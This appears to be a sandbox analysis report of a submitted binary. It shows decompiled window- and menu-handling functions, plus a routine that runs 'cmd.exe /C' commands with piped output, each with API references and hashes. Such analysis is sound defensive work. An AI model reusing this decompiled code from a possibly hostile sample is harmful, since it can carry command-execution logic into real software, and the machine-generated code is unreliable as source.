									_t317 =  *((intOrPtr*)(_t370 + 0x48)) -  *(_v8 + 0x48);
									__eflags = _t317;
									_t318 = _t317 >> 1;
									if(_t317 < 0) {
										asm("adc ebx, 0x0");
									}
									_t314 = _t318 +  *((intOrPtr*)(_t370 + 0x40));
									_t286 =  *((intOrPtr*)(_t370 + 0x4c)) -  *(_v8 + 0x4c);
									__eflags = _t286;
									_t287 = _t286 >> 1;
									if(_t286 < 0) {
										asm("adc eax, 0x0");
									}
									_t278 = _t287 +  *((intOrPtr*)(_t370 + 0x44));
								}
								__eflags = _t314;
								if(_t314 < 0) {
									_t314 = 0;
									__eflags = 0;
								}
								__eflags = _t278;
								if(_t278 < 0) {
									_t278 = 0;
									__eflags = 0;
								}
								_t328 = _t278;
								 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
								_t281 = _v8;
								__eflags =  *((char*)(_t281 + 0x57));
								if( *((char*)(_t281 + 0x57)) != 0) {
									E00454DB8(_v8, _t328);
								}
							}
						}
						 *((char*)(_v8 + 0x230)) = 0;
						if( *((char*)(_v8 + 0x22f)) != 1) {
							ShowWindow(E00441704(_v8),  *(0x49bee0 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
						} else {
							if( *(_v8 + 0x22b) != 2) {
								ShowWindow(E00441704(_v8),  *(0x49bee0 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
								_t220 =  *(_v8 + 0x48) |  *(_v8 + 0x4c) << 0x00000010;
								__eflags = _t220;
								CallWindowProcA(0x407538, E00441704(_v8), 5, 0, _t220);
								E0043B1DC();
							} else {
								_t231 = E00441704(_v8);
								_t232 =  *0x49ebb8; // 0x0
								SendMessageA( *( *((intOrPtr*)(_t232 + 0x44)) + 0x254), 0x223, _t231, 0);
								ShowWindow(E00441704(_v8), 3);
							}
							_t226 =  *0x49ebb8; // 0x0
							SendMessageA( *( *((intOrPtr*)(_t226 + 0x44)) + 0x254), 0x234, 0, 0);
						}
					}
				}
				_pop(_t331);
				 *[fs:eax] = _t331;
				_push(0x456eb0);
				_t154 = _v8;
				 *(_t154 + 0x2f4) =  *(_t154 + 0x2f4) & 0x000000fb;
				return _t154;
			}



























































                                                    0x0045695d
                                                    0x0045695f
                                                    0x00456967
                                                    0x0045696a
                                                    0x0045696f
                                                    0x00456970
                                                    0x00456975
                                                    0x00456978
                                                    0x00456982
                                                    0x00456993
                                                    0x00456998
                                                    0x004569a7
                                                    0x004569ac
                                                    0x004569ac
                                                    0x004569b1
                                                    0x004569b6
                                                    0x004569be
                                                    0x004569c7
                                                    0x004569c8
                                                    0x004569cd
                                                    0x004569d0
                                                    0x004569da
                                                    0x004569e0
                                                    0x004569e3
                                                    0x004569ea
                                                    0x00456d8e
                                                    0x00456d8f
                                                    0x00456d94
                                                    0x00456d97
                                                    0x00456da1
                                                    0x00456daa
                                                    0x00456dab
                                                    0x00456dc7
                                                    0x00456dcf
                                                    0x00456dd2
                                                    0x00456dd4
                                                    0x00456dd9
                                                    0x00456dd9
                                                    0x00456dde
                                                    0x00456de1
                                                    0x00456de8
                                                    0x00456df7
                                                    0x00456dfa
                                                    0x00456e01
                                                    0x00456e22
                                                    0x00456e27
                                                    0x00456e2e
                                                    0x00456e33
                                                    0x00456e35
                                                    0x00456e40
                                                    0x00456e45
                                                    0x00456e47
                                                    0x00456e56
                                                    0x00456e56
                                                    0x00456e47
                                                    0x00456e58
                                                    0x00456e5a
                                                    0x00456e8c
                                                    0x00456e5c
                                                    0x00456e74
                                                    0x00456e7a
                                                    0x00456e7a
                                                    0x00456e03
                                                    0x00456e1b
                                                    0x00456e1b
                                                    0x00456dea
                                                    0x00456ded
                                                    0x00456ded
                                                    0x004569f0
                                                    0x004569f2
                                                    0x004569f3
                                                    0x004569f8
                                                    0x004569fb
                                                    0x00456a05
                                                    0x00456a0f
                                                    0x00456a35
                                                    0x00456a61
                                                    0x00456aaa
                                                    0x00456aaa
                                                    0x00456aad
                                                    0x00456aaf
                                                    0x00456ab1
                                                    0x00456ab1
                                                    0x00456ac1
                                                    0x00456ac1
                                                    0x00456ac4
                                                    0x00456ac6
                                                    0x00456ac8
                                                    0x00456ac8
                                                    0x00456a63
                                                    0x00456a63
                                                    0x00456a75
                                                    0x00456a78
                                                    0x00456a7a
                                                    0x00456a7c
                                                    0x00456a7c
                                                    0x00456a7f
                                                    0x00456a8f
                                                    0x00456a92
                                                    0x00456a94
                                                    0x00456a96
                                                    0x00456a96
                                                    0x00456a94
                                                    0x00456acd
                                                    0x00456acf
                                                    0x00456acf
                                                    0x00456ad3
                                                    0x00456ad5
                                                    0x00456ad5
                                                    0x00456ae5
                                                    0x00456aee
                                                    0x00456afb
                                                    0x00456b04
                                                    0x00456b04
                                                    0x00456b0e
                                                    0x00456b11
                                                    0x00456b1c
                                                    0x00456b1f
                                                    0x00456bf3
                                                    0x00456bf5
                                                    0x00456bfb
                                                    0x00456bfe
                                                    0x00456c05
                                                    0x00456c4e
                                                    0x00456c4e
                                                    0x00456c51
                                                    0x00456c53
                                                    0x00456c55
                                                    0x00456c55
                                                    0x00456c65
                                                    0x00456c65
                                                    0x00456c68
                                                    0x00456c6a
                                                    0x00456c6c
                                                    0x00456c6c
                                                    0x00456c07
                                                    0x00456c07
                                                    0x00456c19
                                                    0x00456c19
                                                    0x00456c1c
                                                    0x00456c1e
                                                    0x00456c20
                                                    0x00456c20
                                                    0x00456c23
                                                    0x00456c33
                                                    0x00456c33
                                                    0x00456c36
                                                    0x00456c38
                                                    0x00456c3a
                                                    0x00456c3a
                                                    0x00456c38
                                                    0x00456c6f
                                                    0x00456c71
                                                    0x00456c73
                                                    0x00456c73
                                                    0x00456c73
                                                    0x00456c75
                                                    0x00456c77
                                                    0x00456c79
                                                    0x00456c79
                                                    0x00456c79
                                                    0x00456c92
                                                    0x00456c92
                                                    0x00456b25
                                                    0x00456b25
                                                    0x00456b2a
                                                    0x00456b2d
                                                    0x00456b30
                                                    0x00456b37
                                                    0x00456b3f
                                                    0x00456b45
                                                    0x00456b4a
                                                    0x00456b4c
                                                    0x00456b51
                                                    0x00456b51
                                                    0x00456b4c
                                                    0x00456b54
                                                    0x00456b56
                                                    0x00456b8f
                                                    0x00456b8f
                                                    0x00456b92
                                                    0x00456b94
                                                    0x00456b96
                                                    0x00456b96
                                                    0x00456ba6
                                                    0x00456ba6
                                                    0x00456ba9
                                                    0x00456bab
                                                    0x00456bad
                                                    0x00456bad
                                                    0x00456b58
                                                    0x00456b5e
                                                    0x00456b5e
                                                    0x00456b61
                                                    0x00456b63
                                                    0x00456b65
                                                    0x00456b65
                                                    0x00456b68
                                                    0x00456b71
                                                    0x00456b71
                                                    0x00456b74
                                                    0x00456b76
                                                    0x00456b78
                                                    0x00456b78
                                                    0x00456b7b
                                                    0x00456b7b
                                                    0x00456bb0
                                                    0x00456bb2
                                                    0x00456bb4
                                                    0x00456bb4
                                                    0x00456bb4
                                                    0x00456bb6
                                                    0x00456bb8
                                                    0x00456bba
                                                    0x00456bba
                                                    0x00456bba
                                                    0x00456bca
                                                    0x00456bd3
                                                    0x00456bd9
                                                    0x00456bdc
                                                    0x00456be0
                                                    0x00456be9
                                                    0x00456be9
                                                    0x00456be0
                                                    0x00456b1f
                                                    0x00456c9b
                                                    0x00456cac
                                                    0x00456d82
                                                    0x00456cb2
                                                    0x00456cbc
                                                    0x00456d0f
                                                    0x00456d23
                                                    0x00456d23
                                                    0x00456d38
                                                    0x00456d40
                                                    0x00456cbe
                                                    0x00456cc3
                                                    0x00456cce
                                                    0x00456cdd
                                                    0x00456ced
                                                    0x00456ced
                                                    0x00456d4e
                                                    0x00456d5d
                                                    0x00456d5d
                                                    0x00456cac
                                                    0x004569ea
                                                    0x00456e93
                                                    0x00456e96
                                                    0x00456e99
                                                    0x00456e9e
                                                    0x00456ea1
                                                    0x00456ea8

                                                    APIs
                                                    • SendMessageA.USER32(?,00000223,00000000,00000000), ref: 00456CDD
                                                      • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LoadMessageSendString
                                                    • String ID: @/B
                                                    • API String ID: 1946433856-85281795
                                                    • Opcode ID: f732cc950298462dbf8775e8013057fa37c1ddea6ba143f1f22029aec632b822
                                                    • Instruction ID: 4b6bfc7c0ddb1c0560f123697eaff68a2ce520b055fb56cf76eb45ff435e8cfa
                                                    • Opcode Fuzzy Hash: f732cc950298462dbf8775e8013057fa37c1ddea6ba143f1f22029aec632b822
                                                    • Instruction Fuzzy Hash: 18F14E30A00204EFDB01DBA9C985F9E77F5AB05305F6545B6E944AB3A3D738BE44DB48
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00475384 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 158processfilesynchronizationCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 38%
                                                    			E00475384(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __esi, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				long _v24;
				char _v28;
				struct _SECURITY_ATTRIBUTES _v40;
				struct _STARTUPINFOA _v108;
				struct _PROCESS_INFORMATION _v124;
				char _v380;
				char _v384;
				char _v388;
				CHAR* _t77;
				void* _t112;
				intOrPtr _t125;
				intOrPtr _t126;
				void* _t131;
				void* _t133;
				void* _t134;
				intOrPtr _t135;

				_t133 = _t134;
				_t135 = _t134 + 0xfffffe80;
				_v388 = 0;
				_v384 = 0;
				_v28 = 0;
				_t131 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				E00404E70(_v12);
				_push(_t133);
				_push(0x4755bb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t135;
				E004049C0(__ecx);
				_v40.nLength = 0xc;
				_v40.bInheritHandle = 0xffffffff;
				_v40.lpSecurityDescriptor = 0;
				CreatePipe( &_v16,  &_v20,  &_v40, 0);
				_push(_t133);
				_push(0x475581);
				_push( *[fs:eax]);
				 *[fs:eax] = _t135;
				E004032B4( &_v108, 0x44);
				_v108.cb = 0x44;
				_v108.dwFlags = 0x101;
				_v108.wShowWindow = 0;
				_v108.hStdInput = GetStdHandle(0xfffffff6);
				_v108.hStdOutput = _v20;
				_v108.hStdError = _v20;
				if(E00409A58(_v12) == 0) {
					E00404A58( &_v28, 0x4755d0);
				} else {
					E00404A58( &_v28, _v12);
				}
				_t77 = E00404E80(_v28);
				E00404CCC( &_v384, _v8, "cmd.exe /C ");
				CreateProcessA(0, E00404E80(_v384), 0, 0, 0xffffffff, 0, 0, _t77,  &_v108,  &_v124);
				asm("sbb ebx, ebx");
				_t112 = 1;
				CloseHandle(_v20);
				if(1 == 0) {
					_pop(_t125);
					 *[fs:eax] = _t125;
					_push(0x475588);
					return CloseHandle(_v16);
				} else {
					_push(_t133);
					_push(0x475563);
					_push( *[fs:eax]);
					 *[fs:eax] = _t135;
					do {
						ReadFile(_v16,  &_v380, 0xff,  &_v24, 0);
						asm("sbb ebx, ebx");
						_t112 = _t112 + 1;
						if(_v24 > 0) {
							 *((char*)(_t133 + _v24 - 0x178)) = 0;
							OemToCharA( &_v380,  &_v380);
							E00404C30( &_v388, 0x100,  &_v380);
							E00404C88(_t131, _v388);
						}
					} while (_t112 != 0 && _v24 != 0);
					WaitForSingleObject(_v124.hProcess, 0xffffffff);
					_pop(_t126);
					 *[fs:eax] = _t126;
					_push(0x47556a);
					CloseHandle(_v124.hThread);
					return CloseHandle(_v124);
				}
			}























                                                    0x00475385
                                                    0x00475387
                                                    0x00475391
                                                    0x00475397
                                                    0x0047539d
                                                    0x004753a0
                                                    0x004753a2
                                                    0x004753a5
                                                    0x004753ab
                                                    0x004753b3
                                                    0x004753ba
                                                    0x004753bb
                                                    0x004753c0
                                                    0x004753c3
                                                    0x004753c8
                                                    0x004753cd
                                                    0x004753d4
                                                    0x004753dd
                                                    0x004753ee
                                                    0x004753f5
                                                    0x004753f6
                                                    0x004753fb
                                                    0x004753fe
                                                    0x0047540b
                                                    0x00475410
                                                    0x00475417
                                                    0x0047541e
                                                    0x0047542b
                                                    0x00475431
                                                    0x00475437
                                                    0x00475444
                                                    0x0047545b
                                                    0x00475446
                                                    0x0047544c
                                                    0x0047544c
                                                    0x0047546b
                                                    0x00475489
                                                    0x0047549c
                                                    0x004754a4
                                                    0x004754a6
                                                    0x004754ab
                                                    0x004754b2
                                                    0x0047556c
                                                    0x0047556f
                                                    0x00475572
                                                    0x00475580
                                                    0x004754b8
                                                    0x004754ba
                                                    0x004754bb
                                                    0x004754c0
                                                    0x004754c3
                                                    0x004754c6
                                                    0x004754dc
                                                    0x004754e4
                                                    0x004754e6
                                                    0x004754eb
                                                    0x004754f0
                                                    0x00475506
                                                    0x0047551c
                                                    0x00475529
                                                    0x00475529
                                                    0x0047552e
                                                    0x0047553e
                                                    0x00475545
                                                    0x00475548
                                                    0x0047554b
                                                    0x00475554
                                                    0x00475562
                                                    0x00475562

                                                    APIs
                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000,?,?,?,?,00000000,004755BB), ref: 004753EE
                                                    • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,?,?,00000000,00475581,?,?,?), ref: 00475426
                                                      • Part of subcall function 00409A58: GetFileAttributesA.KERNEL32(00000000,?,00473256,?,?,00000000,00000005,?,00000000,004732A8,?,00000000,00473306), ref: 00409A63
                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,000000F6), ref: 0047549C
                                                    • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,000000F6), ref: 004754AB
                                                    • ReadFile.KERNEL32(?,?,000000FF,?,00000000,00000000,00475563,?,?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 004754DC
                                                    • OemToCharA.USER32 ref: 00475506
                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,000000FF,?,00000000,00000000,00475563,?,?,00000000,00000000,00000000,00000000,000000FF), ref: 0047553E
                                                    • CloseHandle.KERNEL32(?,0047556A,?,000000FF,?,00000000,00000000,00475563,?,?,00000000,00000000,00000000,00000000,000000FF,00000000), ref: 00475554
                                                    • CloseHandle.KERNEL32(?,?,0047556A,?,000000FF,?,00000000,00000000,00475563,?,?,00000000,00000000,00000000,00000000,000000FF), ref: 0047555D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Handle$Close$CreateFile$AttributesCharObjectPipeProcessReadSingleWait
                                                    • String ID: C:\$D$cmd.exe /C
                                                    • API String ID: 3269375759-2807548070
                                                    • Opcode ID: 337c76df8ed0ba55073ab9dc257bd6663246026ec8d7fff9333260b9ae0deff7
                                                    • Instruction ID: 82437ea0ccec46d2af5a08e72f5cf6232f0238eba76bb00f3cc1c06be9a4dd54
                                                    • Opcode Fuzzy Hash: 337c76df8ed0ba55073ab9dc257bd6663246026ec8d7fff9333260b9ae0deff7
                                                    • Instruction Fuzzy Hash: 6E5150B1904608AFDB10EFA5C881BDEB7B8EB48314F51457AF518F72C1DB785E448B68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044EA40 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 405nativeCOMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 91%
                                                    			E0044EA40(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				struct HMENU__* _v12;
				signed int _v16;
				char _v17;
				intOrPtr _v24;
				int _v28;
				struct HDC__* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr* _v48;
				char _v52;
				intOrPtr _t137;
				signed int _t138;
				struct HWND__* _t144;
				signed int _t150;
				signed int _t151;
				intOrPtr* _t153;
				void* _t158;
				struct HMENU__* _t160;
				intOrPtr* _t165;
				void* _t173;
				signed int _t177;
				signed int _t181;
				void* _t182;
				void* _t214;
				void* _t252;
				signed int _t258;
				void* _t266;
				signed int _t272;
				signed int _t273;
				signed int _t275;
				signed int _t276;
				signed int _t278;
				signed int _t279;
				signed int _t281;
				signed int _t282;
				signed int _t284;
				signed int _t285;
				signed int _t287;
				signed int _t288;
				signed int _t291;
				signed int _t292;
				intOrPtr _t308;
				intOrPtr _t312;
				intOrPtr _t334;
				intOrPtr _t343;
				intOrPtr _t347;
				intOrPtr* _t354;
				signed int _t356;
				intOrPtr* _t357;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				signed int _t374;
				intOrPtr* _t376;
				void* _t378;
				void* _t379;
				intOrPtr _t380;
				void* _t381;

				_t378 = _t379;
				_t380 = _t379 + 0xffffffd0;
				_v52 = 0;
				_t376 = __edx;
				_v8 = __eax;
				_push(_t378);
				_push(0x44ef73);
				_push( *[fs:eax]);
				 *[fs:eax] = _t380;
				_t137 =  *__edx;
				_t381 = _t137 - 0x111;
				if(_t381 > 0) {
					_t138 = _t137 - 0x117;
					__eflags = _t138;
					if(_t138 == 0) {
						_t272 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t272;
						if(_t272 < 0) {
							goto L67;
						} else {
							_t273 = _t272 + 1;
							_t368 = 0;
							__eflags = 0;
							while(1) {
								_t150 = L0044DDEC(E0041AC6C(_v8, _t368),  *(_t376 + 4), __eflags);
								__eflags = _t150;
								if(_t150 != 0) {
									goto L68;
								}
								_t368 = _t368 + 1;
								_t273 = _t273 - 1;
								__eflags = _t273;
								if(_t273 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
					} else {
						_t151 = _t138 - 8;
						__eflags = _t151;
						if(_t151 == 0) {
							_v17 = 0;
							__eflags =  *(__edx + 6) & 0x00000010;
							if(( *(__edx + 6) & 0x00000010) != 0) {
								_v17 = 1;
							}
							_t275 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t275;
							if(__eflags < 0) {
								L32:
								_t153 =  *0x49dbcc; // 0x49ebb8
								E0045B010( *_t153, 0, __eflags);
								goto L67;
							} else {
								_t276 = _t275 + 1;
								_t369 = 0;
								__eflags = 0;
								while(1) {
									__eflags = _v17 - 1;
									if(_v17 != 1) {
										_v12 =  *(_t376 + 4) & 0x0000ffff;
									} else {
										_t160 =  *(_t376 + 8);
										__eflags = _t160;
										if(_t160 == 0) {
											_v12 = 0xffffffff;
										} else {
											_v12 = GetSubMenu(_t160,  *(_t376 + 4) & 0x0000ffff);
										}
									}
									_t158 = E0041AC6C(_v8, _t369);
									_t296 = _v17;
									_v16 = L0044DD30(_t158, _v17, _v12);
									__eflags = _v16;
									if(__eflags != 0) {
										break;
									}
									_t369 = _t369 + 1;
									_t276 = _t276 - 1;
									__eflags = _t276;
									if(__eflags != 0) {
										continue;
									} else {
										goto L32;
									}
									goto L68;
								}
								E004380E0( *((intOrPtr*)(_v16 + 0x58)), _t296,  &_v52, __eflags);
								_t165 =  *0x49dbcc; // 0x49ebb8
								E0045B010( *_t165, _v52, __eflags);
							}
						} else {
							__eflags = _t151 == 1;
							if(_t151 == 1) {
								_t278 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t278;
								if(_t278 < 0) {
									goto L67;
								} else {
									_t279 = _t278 + 1;
									_t370 = 0;
									__eflags = 0;
									while(1) {
										_v48 = E0041AC6C(_v8, _t370);
										_t173 =  *((intOrPtr*)( *_v48 + 0x34))();
										__eflags = _t173 -  *(_t376 + 8);
										if(_t173 ==  *(_t376 + 8)) {
											break;
										}
										_t177 = L0044DD30(_v48, 1,  *(_t376 + 8));
										__eflags = _t177;
										if(_t177 == 0) {
											_t370 = _t370 + 1;
											_t279 = _t279 - 1;
											__eflags = _t279;
											if(_t279 != 0) {
												continue;
											} else {
												goto L67;
											}
										} else {
											break;
										}
										goto L68;
									}
									E0044E630(_v48, _t376);
								}
							} else {
								goto L67;
							}
						}
					}
					goto L68;
				} else {
					if(_t381 == 0) {
						_t281 =  *((intOrPtr*)(_v8 + 8)) - 1;
						__eflags = _t281;
						if(_t281 < 0) {
							goto L67;
						} else {
							_t282 = _t281 + 1;
							_t371 = 0;
							__eflags = 0;
							while(1) {
								E0041AC6C(_v8, _t371);
								_t181 = L0044DDD0( *(_t376 + 4), __eflags);
								__eflags = _t181;
								if(_t181 != 0) {
									goto L68;
								}
								_t371 = _t371 + 1;
								_t282 = _t282 - 1;
								__eflags = _t282;
								if(_t282 != 0) {
									continue;
								} else {
									goto L67;
								}
								goto L68;
							}
						}
						goto L68;
					} else {
						_t182 = _t137 - 0x2b;
						if(_t182 == 0) {
							_v40 =  *((intOrPtr*)(__edx + 8));
							_t284 =  *((intOrPtr*)(_v8 + 8)) - 1;
							__eflags = _t284;
							if(_t284 < 0) {
								goto L67;
							} else {
								_t285 = _t284 + 1;
								_t372 = 0;
								__eflags = 0;
								while(1) {
									_v16 = L0044DD30(E0041AC6C(_v8, _t372), 0,  *((intOrPtr*)(_v40 + 8)));
									__eflags = _v16;
									if(_v16 != 0) {
										break;
									}
									_t372 = _t372 + 1;
									_t285 = _t285 - 1;
									__eflags = _t285;
									if(_t285 != 0) {
										continue;
									} else {
										goto L67;
									}
									goto L69;
								}
								_v24 = E0042572C(0, 1);
								_push(_t378);
								_push(0x44eda6);
								_push( *[fs:eax]);
								 *[fs:eax] = _t380;
								_v28 = SaveDC( *(_v40 + 0x18));
								_push(_t378);
								_push(0x44ed89);
								_push( *[fs:eax]);
								 *[fs:eax] = _t380;
								L00425CE8(_v24,  *(_v40 + 0x18));
								L00425B88(_v24);
								E0044F218(_v16, _v40 + 0x1c, _v24,  *((intOrPtr*)(_v40 + 0x10)));
								_pop(_t334);
								 *[fs:eax] = _t334;
								_push(0x44ed90);
								__eflags = 0;
								L00425CE8(_v24, 0);
								return RestoreDC( *(_v40 + 0x18), _v28);
							}
						} else {
							_t214 = _t182 - 1;
							if(_t214 == 0) {
								_v44 =  *((intOrPtr*)(__edx + 8));
								_t287 =  *((intOrPtr*)(_v8 + 8)) - 1;
								__eflags = _t287;
								if(_t287 < 0) {
									goto L67;
								} else {
									_t288 = _t287 + 1;
									_t373 = 0;
									__eflags = 0;
									while(1) {
										_v16 = L0044DD30(E0041AC6C(_v8, _t373), 0,  *((intOrPtr*)(_v44 + 8)));
										__eflags = _v16;
										if(_v16 != 0) {
											break;
										}
										_t373 = _t373 + 1;
										_t288 = _t288 - 1;
										__eflags = _t288;
										if(_t288 != 0) {
											continue;
										} else {
											goto L67;
										}
										goto L69;
									}
									_v32 = GetWindowDC( *(_v8 + 0x10));
									 *[fs:eax] = _t380;
									_v24 = E0042572C(0, 1);
									 *[fs:eax] = _t380;
									_v28 = SaveDC(_v32);
									 *[fs:eax] = _t380;
									L00425CE8(_v24, _v32);
									L00425B88(_v24);
									 *((intOrPtr*)( *_v16 + 0x38))(_v44 + 0x10,  *[fs:eax], 0x44eea7, _t378,  *[fs:eax], 0x44eec4, _t378,  *[fs:eax], 0x44eee9, _t378);
									_pop(_t343);
									 *[fs:eax] = _t343;
									_push(0x44eeae);
									__eflags = 0;
									L00425CE8(_v24, 0);
									return RestoreDC(_v32, _v28);
								}
							} else {
								if(_t214 == 0x27) {
									_v36 =  *((intOrPtr*)(__edx + 8));
									_t291 =  *((intOrPtr*)(_v8 + 8)) - 1;
									__eflags = _t291;
									if(_t291 < 0) {
										goto L67;
									} else {
										_t292 = _t291 + 1;
										_t374 = 0;
										__eflags = 0;
										while(1) {
											_t252 =  *((intOrPtr*)( *((intOrPtr*)(E0041AC6C(_v8, _t374))) + 0x34))();
											_t347 = _v36;
											__eflags = _t252 -  *((intOrPtr*)(_t347 + 0xc));
											if(_t252 !=  *((intOrPtr*)(_t347 + 0xc))) {
												_v16 = L0044DD30(E0041AC6C(_v8, _t374), 1,  *((intOrPtr*)(_v36 + 0xc)));
											} else {
												_v16 =  *((intOrPtr*)(E0041AC6C(_v8, _t374) + 0x34));
											}
											__eflags = _v16;
											if(_v16 != 0) {
												break;
											}
											_t374 = _t374 + 1;
											_t292 = _t292 - 1;
											__eflags = _t292;
											if(_t292 != 0) {
												continue;
											} else {
												goto L67;
											}
											goto L68;
										}
										_t258 = L0044DD60(E0041AC6C(_v8, _t374), 1,  *((intOrPtr*)(_v36 + 8)));
										__eflags = _t258;
										if(_t258 == 0) {
											_t266 = E0041AC6C(_v8, _t374);
											__eflags = 0;
											_t258 = L0044DD60(_t266, 0,  *((intOrPtr*)(_v36 + 0xc)));
										}
										_t354 =  *0x49de0c; // 0x49ebbc
										_t356 =  *( *_t354 + 0x6c);
										__eflags = _t356;
										if(_t356 != 0) {
											__eflags = _t258;
											if(_t258 == 0) {
												_t258 =  *(_t356 + 0x158);
											}
											_t308 =  *0x49de0c; // 0x49ebbc
											__eflags =  *(_t356 + 0x228) & 0x00000008;
											if(( *(_t356 + 0x228) & 0x00000008) == 0) {
												_t357 =  *0x49dbcc; // 0x49ebb8
												E0045ACB4( *_t357, _t292, _t308, _t258, _t374, _t376);
											} else {
												E0045AD1C();
											}
										}
									}
								} else {
									L67:
									_push( *(_t376 + 8));
									_push( *(_t376 + 4));
									_push( *_t376);
									_t144 =  *(_v8 + 0x10);
									_push(_t144);
									L00407540();
									 *(_t376 + 0xc) = _t144;
								}
								L68:
								_pop(_t312);
								 *[fs:eax] = _t312;
								_push(0x44ef7a);
								return E004049C0( &_v52);
							}
						}
					}
				}
				L69:
			}


































































                                                    0x0044ea41
                                                    0x0044ea43
                                                    0x0044ea4b
                                                    0x0044ea4e
                                                    0x0044ea50
                                                    0x0044ea55
                                                    0x0044ea56
                                                    0x0044ea5b
                                                    0x0044ea5e
                                                    0x0044ea61
                                                    0x0044ea63
                                                    0x0044ea68
                                                    0x0044ea8a
                                                    0x0044ea8a
                                                    0x0044ea8f
                                                    0x0044eade
                                                    0x0044eadf
                                                    0x0044eae1
                                                    0x00000000
                                                    0x0044eae7
                                                    0x0044eae7
                                                    0x0044eae8
                                                    0x0044eae8
                                                    0x0044eaea
                                                    0x0044eaf7
                                                    0x0044eafc
                                                    0x0044eafe
                                                    0x00000000
                                                    0x00000000
                                                    0x0044eb04
                                                    0x0044eb05
                                                    0x0044eb05
                                                    0x0044eb06
                                                    0x00000000
                                                    0x0044eb08
                                                    0x00000000
                                                    0x0044eb08
                                                    0x00000000
                                                    0x0044eb06
                                                    0x0044eaea
                                                    0x0044ea91
                                                    0x0044ea91
                                                    0x0044ea91
                                                    0x0044ea94
                                                    0x0044eb0d
                                                    0x0044eb11
                                                    0x0044eb15
                                                    0x0044eb17
                                                    0x0044eb17
                                                    0x0044eb21
                                                    0x0044eb22
                                                    0x0044eb24
                                                    0x0044eb9a
                                                    0x0044eb9a
                                                    0x0044eba3
                                                    0x00000000
                                                    0x0044eb26
                                                    0x0044eb26
                                                    0x0044eb27
                                                    0x0044eb27
                                                    0x0044eb29
                                                    0x0044eb29
                                                    0x0044eb2d
                                                    0x0044eb53
                                                    0x0044eb2f
                                                    0x0044eb2f
                                                    0x0044eb32
                                                    0x0044eb34
                                                    0x0044eb46
                                                    0x0044eb36
                                                    0x0044eb41
                                                    0x0044eb41
                                                    0x0044eb34
                                                    0x0044eb5b
                                                    0x0044eb60
                                                    0x0044eb6b
                                                    0x0044eb6e
                                                    0x0044eb72
                                                    0x00000000
                                                    0x00000000
                                                    0x0044eb96
                                                    0x0044eb97
                                                    0x0044eb97
                                                    0x0044eb98
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0044eb98
                                                    0x0044eb7d
                                                    0x0044eb85
                                                    0x0044eb8c
                                                    0x0044eb8c
                                                    0x0044ea96
                                                    0x0044ea96
                                                    0x0044ea97
                                                    0x0044ef00
                                                    0x0044ef01
                                                    0x0044ef03
                                                    0x00000000
                                                    0x0044ef05
                                                    0x0044ef05
                                                    0x0044ef06
                                                    0x0044ef06
                                                    0x0044ef08
                                                    0x0044ef12
                                                    0x0044ef1a
                                                    0x0044ef1d
                                                    0x0044ef20
                                                    0x00000000
                                                    0x00000000
                                                    0x0044ef2a
                                                    0x0044ef2f
                                                    0x0044ef31
                                                    0x0044ef3f
                                                    0x0044ef40
                                                    0x0044ef40
                                                    0x0044ef41
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0044ef31
                                                    0x0044ef38
                                                    0x0044ef38
                                                    0x0044ea9d
                                                    0x00000000
                                                    0x0044ea9d
                                                    0x0044ea97
                                                    0x0044ea94
                                                    0x00000000
                                                    0x0044ea6a
                                                    0x0044ea6a
                                                    0x0044eaa8
                                                    0x0044eaa9
                                                    0x0044eaab
                                                    0x00000000
                                                    0x0044eab1
                                                    0x0044eab1
                                                    0x0044eab2
                                                    0x0044eab2
                                                    0x0044eab4
                                                    0x0044eab9
                                                    0x0044eac2
                                                    0x0044eac7
                                                    0x0044eac9
                                                    0x00000000
                                                    0x00000000
                                                    0x0044eacf
                                                    0x0044ead0
